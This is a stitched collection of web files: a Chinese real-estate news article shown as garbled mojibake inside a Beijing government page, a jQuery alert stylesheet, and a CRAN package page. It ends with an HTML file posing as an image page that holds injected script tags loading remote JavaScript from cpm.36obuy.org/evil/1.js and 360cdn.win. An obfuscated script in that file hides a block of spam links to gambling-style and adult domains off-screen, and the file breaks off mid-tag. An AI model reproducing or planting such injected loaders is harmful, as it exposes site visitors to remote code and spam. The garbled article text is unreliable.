<p>¡¡¡¡±¬·¢Ê½Ôö³¤µÄʱ´úºìÀûһȥ²»¸´·µ£¬¡°ÓÐÖÊÁ¿µÄÔö³¤¡±³ÉΪ2017Äê3Ô·¿ÆóÒµ¼¨·¢²¼»áÉÏ×îÆµ·±±»Ìá¼°µÄÒ»¾ä»°¡£¹æÄ£ÒÔÀûÈóΪÂä½Åµã£¬ÀûÈóÓÖ·´¹ýÀ´ÒªÇó¹æÄ£Ôö³¤ÎªÆäÌṩ֧³Å¡£</p> <p>¡¡¡¡ÀûÈóÂÊÔÚϽµ£¬µ«·¿Æó¶Ô¹æÄ£µÄ¿á°®ÈÔδÏûÍË¡£3ÔÂ22ÈÕ£¬»ªÈóÖõØÖ´Ðж­Ê¡¢¶­Ê»ḱÖ÷Ï¯ÌÆÓÂÔÚͶ×ÊÕß·ÖÎö»áÉϱíʾ£¬¹æÄ£ºÜÖØÒª£¬Òâζ×ÅÐÐÒµµØÎ»¡£</p> <p>¡¡¡¡ÌÆÓ½«¹æÄ£µÄÔö³¤±È×÷¡°³¤ÅÜÓë¶ÌÅÜ¡±µÄ¹ØÏµ£¬ÈôҪ׷Çó¶ÌÆÚ¿ìËÙÔö³¤²¢²»ÄÑ£¬µ«ÕâÖÖ¡°³å´Ì¡±²»¿É³ÖÐø£¬Ö»Óб£Ö¤Ò»¶¨µÄÀûÈóˮƽ²ÅÊÇÓÐÖÊÁ¿µÄÔö³¤¡£ÌÆÓ±íʾ£º¡°ÎÒÃÇ×¢Òâµ½ÒµÄÚ¸ö±ðͬÐйæÄ£Ôö³¤½Ï¿ìµÄÏÖÏ󣬻á×ۺϿ¼ÂÇëÀûÂÊ¡¢¸ºÕ®±ÈÂÊ¡¢¼¤Àø»úÖÆºÍδÀ´·çÏÕµÈÒòËØ£¬×ö³öÊʵ±µÄµ÷Õû¡£¡±</p> <p>¡¡¡¡Öк£Ò²¿ªÊ¼Ç¿µ÷¹æÄ£ÁË¡£¾Ý͸¶£¬Öк£½ñÄêµÄÄõØÔ¤ËãÊÇÈËÃñ±Ò1000ÒÚÔª£¬1600Íòƽ·½Ã×µÄÍÁµØ´¢±¸¡£¶ø2016ÄêÈ«Ä꣬Öк£Ò»¹²ÂòÈë18×ÚÍÁµØ£¬ÐÂÔöÍÁ´¢Îª972Íòƽ·½Ã×£¬ÄõØ×ܽð¶îΪ406.8ÒÚÔª¡£</p> <p>¡¡¡¡Ïà·´£¬ÒÔÍù¹ý¶È×·Öð¹æÄ£µÄ·¿Æó£¬¿ªÊ¼ÖØÊÓÓ¯ÀûÄÜÁ¦µÄÌáÉý¡£×÷Ϊ¹æÄ£µÚÒ»µÄ·¿µØ²úÆóÒµ£¬ºã´ó¹«¿ªÐû²¼£¬Òªµ÷ÕûÕ½ÂÔ£¬ÊµÏÖ¡°¹æÄ£+Ð§Òæ¡±µÄË«Ôö³¤£¬½«´Ó2017ÄêÆðÖð²½ÌáÉý¾»ÀûÂÊˮƽ£¬Ê¹µÃ¸ÃÊý×ÖÔÚδÀ´Á½Äê´ïµ½9%¡«10%µÄˮƽ¡£</p> <p>¡¡¡¡±Ì¹ðÔ°²ÆÎñ²¿ÃŸºÔðÈËÒ²±íʾ£¬Ëæ×Ź«Ë¾½áËãµ¥¼ÛµÄÌáÉý£¬Ô¤¼ÆÎ´À´ÀûÈóÂÊ»áÓÐËùÌáÉý¡£¸Ã¹«Ë¾¹ýÈ¥¼¸ÄêµÄÀûÈóÂÊÖð²½Ï½µ£¬´Ó2012ÄêµÄ16.2%ϽµÖÁ2015ÄêµÄ8.6%£¬ËäÈ»2016ÄêÂÔ΢»ØÉý£¬µ«ÒÀȻά³ÖÓÚ8.9%µÄµÍλ¡£</p> <p>¡¡¡¡Â̳ÇÖйúÐÐÕþ×ܲòÜÖÛÄÏÖ±½ÓÌáµ½ÁËĿǰµÄ·çÏÕÎÊÌâ¡£¡°¼òµ¥µÄ¹æÄ£Ôö³¤£¬ÕâÊǺÜΣÏյģ¬Ò»·½ÃæÊǶÔͶ×ÊÕߵIJ»¸ºÔðÈΣ¬ÁíÒ»·½ÃæÊǶԿͻ§µÄ²»¸ºÔðÈΡ£¡±</p> <p>¡¡¡¡»¹ÓÐÒ»¸öȺÌ壬ÒòΪÔËÓªÄÜÁ¦µÄµô¶Ó¶øÑ¡ÔñÍ˳öÊг¡¡£2016Äê9Ô£¬ÁªÏëÒÔ138ÒÚÔªµÄ¼Û¸ñ½«·¿µØ²úÒµÎñ×ʲú°üתÈøøÈÚ´´;ËæºóµÄ11Ô£¬»ªöιɷݰþÀë·¿µØ²ú¿ª·¢ÒµÎñ¡£Í¬Äê12Ô£¬Öк½µØ²úÏò±£ÀûµØ²ú³öÊ۵ķ¿µØ²úÏîÄ¿¼°¹«Ë¾¹ÉȨÍê³É½»¸î¡£</p> <p style="text-align: center;"><img src="http://img.mp.itc.cn/upload/20170329/8c872e39e7aa4b33abaaa146ade1ca66_th.jpg" alt="" style="max-width:600px;" /></p> <p>¡¡¡¡<strong>Ô¤ÆÚÇ÷ÓÚ½÷É÷</strong></p> <p>¡¡¡¡È¥Ä꣬Öйú·¿µØ²úÐÐÒµÏúÊÛ½ð¶îÍ»ÆÆ11ÍòÒÚ£¬´ïµ½Àúʷиߣ¬¿ª·¢ÉÌÏúÊÛ¶î´ó·ùÔö³¤£¬ÏÖ½ðÓà¶î¿Õǰ³ä×ã¡£µ«°éËæ×ÅÐÂÒ»ÂÖºê¹Ûµ÷¿Ø¸øÊг¡´øÀ´µÄ²»È·¶¨Ç°¾°£¬½øÈë3Ôµ׵Ŀª·¢ÉÌ£¬ÒѾ­Ã÷ÏÔûÓÐÄê³õµÄÀÖ¹Û¡£</p> <p>¡¡¡¡ÔÚ×òÈÕ¾ÙÐеÄÈÚ´´Öйú(01918.HK)Òµ¼¨·¢²¼»áÉÏ£¬ÈÚ´´Öйú¶­Ê³¤Ëïºê±ó±íʾ£¬»õ±ÒÕþ²ßÊÕ½ô£¬ÀûÂÊÔö¼Ó£¬ÕâЩ´ëÊ©»áÓ°Ïìµ½ÆóÒµÏÖ½ðÁ÷£¬´û¿î¼õÉÙ£¬·¿¼Û¿Ï¶¨»áÊÜÓ°Ïì¡£Õâ¸öÐÐÒµ·çÏպܴ󣬷çÏÕ´ó²»ÊÇÒòΪÊг¡£¬ÒòΪÏÖÔÚÂòµÄµØÒª¿÷Ç®¡£¡°Èç¹ûÕæµÄÕþ²ß·ÅËɺó£¬ÎÒÒ²²»´óÏàÐÅ»á´óÕÇ£¬ÒòΪ·¿¼ÛÒÑ´¦ÔÚ¸ßλÁË¡£ÎÒÃǶÔÊг¡ÊǷdz£±¯¹ÛµÄ£¬ÎÒÃÇ´ÓÈ¥Äê10Ô·ݿªÊ¼»ù±¾ÉϾͲ»ÄõØÁË¡£¡±</p> <p>¡¡¡¡ÖÐÔ­µØ²úÊ×ϯ·ÖÎöʦÕÅ´óΰ·ÖÎöÈÏΪ£¬´ÓÕþ²ßÔ¤ÆÚ¿´£¬±¾ÂÖ·¿¼Ûµ÷¿ØÈ«ÃæÔÙÉý¼¶£¬ÓöÕǼ´µ÷¡£¶øÇÒÓëÍùÄêµ÷¿Ø²»Ò»ÑùµÄÊÇ£¬±¾ÂÖµ÷¿ØÁ¦¶ÈË¢ÐÂÁËÀúÊ·¼Í¼£¬¶à´ÎÕþ²ß¿ÉÒÔ˵ȫ·½Ãæ·â¶ÂÁËÈκγ´·¿µÄ¿ÉÄÜÐÔ¡£¡°È«ÃæÊÕ½ô£¬Ô¤ÆÚÔÚ¸ÄÉÆÐèÇó±»ÒÖÖÆºó£¬°üÀ¨±±¾©¡¢³É¶¼¡¢ÏÃÃÅÕâЩ³ÇÊÐÓÐÍûÔٴνøÈëµÍÃÔµ÷ÕûÆÚ£¬³É½»Á¿ÒѾ­³öÏÖÁËÃ÷ÏÔϵ÷¡£¡±</p> <p>¡¡¡¡ÔÚÓíÖ޵زúµÄÒµ¼¨·¢²¼»áÉÏ£¬ÓíÖ޵زú¶­Ê³¤ÁÖÁú°²Ëµ£º¡°·¿¼Ûµ¥ÏòÉÏÕǵÄÄê´úÒѾ­½áÊø£¬Öйú·¿µØ²ú½øÈëÎȶ¨Ôö³¤Ê±´ú¡£¡±</p> <p>¡¡¡¡¡°½ñÄêµÄÏúÊÛÄ¿±êÊÇ300ÒÚ£¬»á¸ù¾Ýʵ¼ÊÇé¿öµ½ÄêÖÐÔÙÌá¸ßÏúÊÛÖ¸±ê£¬Î´À´ÎåÄê¼Æ»®ÒªÍ»ÆÆÇ§ÒÚÏúÊ۶µ«ÊÇÎÒÃǺܹØ×¢Ó¯ÀûÊý¾Ý£¬ÎÒÃÇÏ£Íû°Ñÿ¸öÏîÄ¿ÀûÈóÂÊ×ö¸ß¡£¡±ÁÖÁú°²¸æËß¼ÇÕß¡£ÓíÖ޵زúÄ걨ÏÔʾ£¬2016ÄêÓíÖ޵زúºÏÔ¼ÏúÊÛ½ð¶îΪ232.06ÒÚÔª£¬Í¬±ÈÉÏÉý65.54%;¾»ÀûÈóΪ17.75ÒÚÔª£¬Í¬±ÈÔö³¤7.13%¡£</p> <p>¡¡¡¡Í¬Ñù¶ÔδÀ´±£³Ö½÷É÷µÄ»¹ÓÐÂ̳ÇÖйú£¬ÔÚÆä2016Äê¶ÈÒµ¼¨·¢²¼»áÉÏ£¬²ÜÖÛÄϸüÊDZ£³Ö±¯¹ÛµÄ̬¶È¡£ËûÈÏΪ£¬È¥Äê¹úÄÚз¿³É½»Á¿ÊÇ11.6ÍòÒÚ£¬¿ÉÊÇÔ¼5ÍòÒÚ¹ºÂòÁ¦ÊÇͶ×ʹºÂò¡£¶ø½ñÄê·¿µØ²úÕþ²ßµ÷¿ØÃ÷ÏÔ¼ÓÇ¿£¬Òò´Ë³É½»Á¿Ó¦¸Ã»á½µµ½7ÍòÒÚ¡«8ÍòÒÚ¡£Ãæ¶ÔÕâÑùµÄϽµ·ù¶È£¬ËûÈÏΪºÜ¶à¿ª·¢É̹æÄ£²»¿ÉÄÜÔö¼ÓºÜ¿ì¡£</p> <p>¡¡¡¡³öÓÚÕâÑù½÷É÷µÄÇéÐ÷£¬Â̳ǽ«×Ô¼ºµÄÏúÊÛÄ¿±êÒ²¶¨µÃ·Ç³£±£ÊØ¡£²ÜÖÛÄϱíʾ£¬Â̳Ƿ¿²úÏúÊÛÄ¿±êÔ¼700ÒÚ£¬´ú½¨ÏúÊÛÄ¿±êÔ¼200ÒÚ¡£°´ÕÕ¸ÃÊý×Ö£¬Â̳ǵĹæÄ£»ò±ÈÈ¥ÄêÏ»¬£¬¶ø²ÜÖÛÄÏÔòÈÏΪ¹æÄ£²¢²»ÖØÒª¡£</p> <p>¡¡¡¡ÊÂʵÉÏ£¬ÔÚ´ó¶àÊýÒµÄÚÈËÊ¿¿´À´£¬¶¯éü·­±¶µÄ¹æÄ£Ôö³¤²¢²»ÄܳÖÐø¡£ËùÒÔ£¬ÎȽ¡ÐÍÆóÒµÈçÍò¿Æ¡¢Öк££¬¾ù½«Ã¿ÄêµÄÔö³¤·ù¶ÈÈ·¶¨ÔÚ20%¡«30%×óÓÒ£¬¼´±ãÃæÁÙÊг¡ÐÐÇé´óºÃ£¬Ò²²»»áÓйýÓÚ³¬Ô¤ÆÚµÄ±íÏÖ¡£</p> <p>¡¡¡¡2017Ä꣬ºã´ó½«ÆäºÏͬÏúÊÛÄ¿±êÈ·¶¨Îª4500ÒÚ£¬½ÏÉÏÄ곬¹ý80%µÄÔö³¤·ù¶Èϵ÷Ϊ30%×óÓÒ£¬µ«ÒÀÈ»ÊÇÐÐÒµ×î¸ßÄ¿±ê¡£¶ø±Ì¹ðÔ°Ò»¸Ä´Ëǰ¡°·­±¶¡±µÄ¿ÚºÅ£¬½«Äê¶ÈÄ¿±êÈ·Á¢Îª4000ÒÚ£¬Ôö³¤Ô¼30%¡£</p> <p>¡¡¡¡¸üÖµµÃÌá¼°µÄÊÇ£¬Íò¿ÆÔÚÄ걨ÖжÔ12¸ö³ÇÊеÄÏîÄ¿´æ»õ½øÐÐ13.8ÒÚÔªµÄµø¼Û×¼±¸£¬½Ï2015Äêµ×Ôö³¤82.3%¡£¶ÔÓÚ2016Äê´æ»õµø¼Û×¼±¸£¬Íò¿Æ¶­ÃØÖìÐñÔÚ27ÈÕÕÙ¿ªµÄÒµ¼¨ËµÃ÷»áÉÏ»ØÓ¦³Æ¡£¡°ÕâÖ÷ÒªÊÇ»ùÓÚÉóÉ÷µÄ̬¶È£¬Î´À´ÈÔ½«½÷É÷£¬ÓÈÆä¶ÔÈýËÄÏß³ÇÊб£³Ö½÷É÷¡£¡±</p> </p></div> <div id="filerider"> <div class="filelink" style="margin:10px 0 0 0;"><a href="./P020160207382291268334.doc">¸½¼þ£º2016Äê±±¾©µØÇø²©Îï¹Ý´º½ÚϵÁлһÀÀ±í</a></div> </div> </div> <div id="essaybottom" style="border:0; overflow:hidden; margin-bottom:0;"> <div style="padding-bottom:8px;" id="proclaim"><p style="float:left; line-height:30px;">·ÖÏíµ½£º</p><div class="bdsharebuttonbox"><a href="#" class="bds_more" data-cmd="more"></a><a href="#" class="bds_qzone" data-cmd="qzone"></a><a href="#" class="bds_tsina" data-cmd="tsina"></a><a href="#" class="bds_tqq" data-cmd="tqq"></a><a href="#" class="bds_renren" data-cmd="renren"></a><a href="#" class="bds_weixin" data-cmd="weixin"></a></div> <sCRIPt>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdPic":"","bdStyle":"0","bdSize":"16"},"share":{},"image":{"viewList":["qzone","tsina","tqq","renren","weixin"],"viewText":"·ÖÏíµ½£º","viewSize":"16"},"selectShare":{"bdContainerClass":null,"bdSelectMiniList":["qzone","tsina","tqq","renren","weixin"]}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('sCRIPt')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</sCRIPt></div> </div> <div id="essaybottom" style="margin-top:0;"> <div style="padding-bottom:8px;" id="proclaim">תժÉùÃ÷£º×ªÕªÇë×¢Ã÷³ö´¦²¢×ö»ØÁ´</div> </div> </div> </div> <!-- /container --> <div id="footer"> <div class="container"> <div class="span1" style="text-align:center"><sCRIPt type="text/javasCRIPt">document.write(unescape("%3Cspan id='_ideConac' %3E%3C/span%3E%3CsCRIPt src='http://dcs.conac.cn/js/01/000/0000/60429971/CA010000000604299710004.js' type='text/javasCRIPt'%3E%3C/sCRIPt%3E"));</sCRIPt></div> <div class="span8"> <div class="footer-top"> <div class="footer-class"> <p> <a title="¹ØÓÚÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306339.htm" style=" background:0">¹ØÓÚÎÒÃÇ</a><a target="_blank" title="Õ¾µãµØÍ¼" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306342.htm">Õ¾µãµØÍ¼</a><a target="_blank" title="ÁªÏµÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306343.htm">ÁªÏµÎÒÃÇ</a><a target="_blank" title="ÆÀ¼ÛÊ×¶¼Ö®´°" href="mailto:service@beijing.gov.cn">ÆÀ¼ÛÊ×¶¼Ö®´°</a><a target="_blank" title="·¨ÂÉÉùÃ÷" href="http://www.beijing.gov.cn/zdxx/t709204.htm">·¨ÂÉÉùÃ÷</a> </p> <p>Ö÷°ì£º±±¾©ÊÐÈËÃñÕþ¸® °æÈ¨ËùÓга죺±±¾©Êо­¼ÃºÍÐÅÏ¢»¯Î¯Ô±»á ¾©ICP±¸05060933ºÅ ÔËÐйÜÀí£ºÊ×¶¼Ö®´°ÔËÐйÜÀíÖÐÐÄ</p> <p>¾©¹«Íø°²±¸ 110105000722 µØÖ·£º±±¾©Êг¯ÑôÇø±±³½Î÷·Êý×Ö±±¾©´óÏÃÄϰ˲㠴«Õ棺84371700 ¿Í·þÖÐÐĵ绰£º59321109</p> </div> </div> </div> </div> </div> <div style="display:none"> <sCRIPt type="text/javasCRIPt">document.write(unescape("%3CsCRIPt src='http://yhfx.beijing.gov.cn/webdig.js?z=12' type='text/javasCRIPt'%3E%3C/sCRIPt%3E"));</sCRIPt> <sCRIPt type="text/javasCRIPt">wd_paramtracker("_wdxid=000000000000000000000000000000000000000000")</sCRIPt> </div> <sCRIPt src="http://static.gridsumdissector.com/js/Clients/GWD-800003-C99186/gs.js" language="JavaScript"></sCRIPt> <sCRIPt type="text/javasCRIPt"> // ÉèÖÃΪÖ÷Ò³ function SetHome(obj,vrl){ try{ obj.style.behavior='url(#default#homepage)';obj.setHomePage(vrl); } catch(e){ if(window.netscape) { try { netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect"); } catch (e) { alert("´Ë²Ù×÷±»ä¯ÀÀÆ÷¾Ü¾ø£¡\nÇëÔÚä¯ÀÀÆ÷µØÖ·À¸ÊäÈë¡°about:config¡±²¢»Ø³µ\nÈ»ºó½« [signed.applets.codebase_principal_support]µÄÖµÉèÖÃΪ'true',Ë«»÷¼´¿É¡£"); } var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch); prefs.setCharPref('browser.startup.homepage',vrl); }else{ alert("ÄúµÄä¯ÀÀÆ÷²»Ö§³Ö£¬Çë°´ÕÕÏÂÃæ²½Öè²Ù×÷£º1.´ò¿ªä¯ÀÀÆ÷ÉèÖá£2.µã»÷ÉèÖÃÍøÒ³¡£3.ÊäÈ룺"+vrl+"µã»÷È·¶¨¡£"); } } } // ¼ÓÈëÊÕ²Ø ¼æÈÝ360ºÍIE6 function shoucang(sTitle,sURL) { try { window.external.addFavorite(sURL, sTitle); } catch (e) { try { window.sidebar.addPanel(sTitle, sURL, ""); } catch (e) { alert("¼ÓÈëÊÕ²ØÊ§°Ü£¬ÇëʹÓÃCtrl+D½øÐÐÌí¼Ó"); } } } </sCRIPt> <!-- Le javasCRIPt ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <sCRIPt src="/images/zhuanti/xysym/jquery.js"></sCRIPt> <sCRIPt src="/images/zhuanti/xysym/bootstrap-collapse.js"></sCRIPt> <sCRIPt> $(document).ready(function(){ $(".ui-select").selectWidget({ change : function (changes) { return changes; }, effect : "slide", keyControl : true, speed : 200, scrollHeight : 250 }); }); </sCRIPt> </body> </html>
css/jquery/jquery.alerts.css
iriber/turnos-ui
#popup_container { font-family: Arial, sans-serif; font-size: 12px; min-width: 300px; /* Dialog will be no smaller than this */ max-width: 600px; /* Dialog will wrap after this width */ background: #FFF; border: solid 5px #999; color: #000; -moz-border-radius: 5px; -webkit-border-radius: 5px; border-radius: 5px; } #popup_title { font-size: 14px; font-weight: bold; text-align: center; line-height: 1.75em; color: #666; background: #CCC url(img_jquery/title.gif) top repeat-x; border: solid 1px #FFF; border-bottom: solid 1px #999; cursor: default; padding: 0em; margin: 0em; } #popup_content { background: 16px 16px no-repeat url(img_jquery/info.gif); padding: 1em 1.75em; margin: 0em; } #popup_content.alert { background-image: url(img_jquery/info.gif); } #popup_content.confirm { background-image: url(img_jquery/important.gif); } #popup_content.prompt { background-image: url(img_jquery/help.gif); } #popup_message { padding-left: 48px; } #popup_panel { text-align: center; margin: 1em 0em 0em 1em; } #popup_prompt { margin: .5em 0em; }
Code/GetMetaDataFromCRAN/raw_html/flowfield.html
esander91/NamespacePollution
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CRAN - Package flowfield</title> <link rel="stylesheet" type="text/css" href="../../CRAN_web.css" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> table td { vertical-align: top; } </style> </head> <body> <h2>flowfield: Forecasts future values of a univariate time series</h2> <p>Flow field forecasting draws information from an interpolated flow field of the observed time series to incrementally build a forecast.</p> <table summary="Package flowfield summary"> <tr> <td>Version:</td> <td>1.0</td> </tr> <tr> <td>Suggests:</td> <td><a href="../SemiPar/index.html">SemiPar</a></td> </tr> <tr> <td>Published:</td> <td>2014-03-06</td> </tr> <tr> <td>Author:</td> <td>Kyle A. Caudle</td> </tr> <tr> <td>Maintainer:</td> <td>Kyle A. Caudle &#x3c;&#x6b;&#x79;&#x6c;&#x65;&#x2e;&#x63;&#x61;&#x75;&#x64;&#x6c;&#x65;&#x20;&#x61;&#x74;&#x20;&#x73;&#x64;&#x73;&#x6d;&#x74;&#x2e;&#x65;&#x64;&#x75;&#x3e;</td> </tr> <tr> <td>License:</td> <td><a href="../../licenses/GPL-3">GPL-3</a></td> </tr> <tr> <td>NeedsCompilation:</td> <td>no</td> </tr> <tr> <td>CRAN&nbsp;checks:</td> <td><a href="../../checks/check_results_flowfield.html">flowfield results</a></td> </tr> </table> <h4>Downloads:</h4> <table summary="Package flowfield downloads"> <tr> <td> Reference&nbsp;manual: </td> <td> <a href="flowfield.pdf"> flowfield.pdf </a> </td> </tr> <tr> <td> Package&nbsp;source: </td> <td> <a href="../../../src/contrib/flowfield_1.0.tar.gz"> flowfield_1.0.tar.gz </a> </td> </tr> <tr> <td> Windows&nbsp;binaries: </td> <td> r-devel: <a href="../../../bin/windows/contrib/3.5/flowfield_1.0.zip">flowfield_1.0.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/flowfield_1.0.zip">flowfield_1.0.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/flowfield_1.0.zip">flowfield_1.0.zip</a> </td> </tr> <tr> <td> OS&nbsp;X&nbsp;El&nbsp;Capitan&nbsp;binaries: </td> <td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/flowfield_1.0.tgz">flowfield_1.0.tgz</a> </td> </tr> <tr> <td> OS&nbsp;X&nbsp;Mavericks&nbsp;binaries: </td> <td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/flowfield_1.0.tgz">flowfield_1.0.tgz</a> </td> </tr> </table> <h4>Linking:</h4> <p>Please use the canonical form <a href="https://CRAN.R-project.org/package=flowfield"><samp>https://CRAN.R-project.org/package=flowfield</samp></a> to link to this page.</p> </body> </html>
images/Core2Duo/020412060r42gx.html
ForAEdesWeb/AEW2
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a> <a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a> <a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a> <a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a> <a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a> <a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a> <a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a> <a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a> <a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a> <a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a> <a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a> <a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a> <a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a> <a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a> <a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a> <a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a> <a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a> <a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a> <a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a> <a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a> <a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a> <a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a> <a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a> <a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a> <a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a> <a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a> <a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a> <a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a> <a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a> <a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a> <a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a> <a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a> <a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a> <a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a> <a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a> <a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a> <a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a> <a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a> <a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a> <a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a> <a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a> <a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a> <a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a> <a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a> <a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a> <a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a> <a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a> <a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a> <a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a> <a 